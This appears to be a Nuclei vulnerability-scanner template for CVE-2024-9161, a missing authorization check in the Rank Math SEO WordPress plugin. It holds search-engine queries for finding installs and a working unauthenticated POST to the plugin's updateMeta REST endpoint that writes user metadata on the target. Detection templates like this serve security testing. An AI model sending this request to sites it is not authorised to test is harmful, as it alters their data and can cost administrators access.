id: CVE-2024-9161

info:
  name: Rank Math SEO < 1.0.229 - Unauthenticated User and Term Metadata Insert/Update/Deletion
  author: Kazgangap
  severity: medium
  description: |
    Rank Math SEO – AI SEO Tools to Dominate SEO Rankings plugin for WordPress contains a missing capability check on 'update_metadata' in all versions up to 1.0.228, letting unauthenticated attackers insert, update, or delete metadata, including user and term metadata, potentially causing loss of access to the admin dashboard.
  impact: |
    Unauthenticated attackers can modify or delete metadata, leading to data loss and potential denial of access to the admin dashboard.
  remediation: |
    Update to version 1.0.229 or later.
  reference:
    - https://wpscan.com/vulnerability/95be2559-f0e2-4e98-9bef-3989df0d25bf/
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L120
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L161
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L162
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L64
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
    cvss-score: 6.5
    cve-id: CVE-2024-9161
    cwe-id: CWE-862
    epss-score: 0.23642
    epss-percentile: 0.96123
    cpe: cpe:2.3:a:rankmath:seo:*:*:*:*:free:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: rankmath
    product: seo
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/seo-by-rank-math/"
    fofa-query: body="/wp-content/plugins/seo-by-rank-math/"
    publicwww-query: "/wp-content/plugins/seo-by-rank-math/"
  tags: cve,cve2024,wordpress,seo-by-rank-math,wp-plugin,wpscan,rankmath,intrusive,vkev

variables:
  objectid: "{{rand_int(1,9)}}"
  data: "meta_{{to_lower(rand_text_alpha(12))}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/seo-by-rank-math/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Rank Math")'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-json/rankmath/v1/updateMeta HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "objectType": "user",
          "objectID": {{objectid}},
          "meta": {
            "{{data}}": "{{data}}"
          }
        }

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"slug", "true", "schemas")'
          - 'contains(content_type, "application/json")'
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502207ee5518b3a42d55d0de2eb933b8a5811778cb5b9a7cae1d69bce7ad5623542cc022100f0f6444bbaa94971ce61f0ce65b6896dce6131a2928c8e392d74e4668e104705:922c64590222798bb761d5b6d8e72950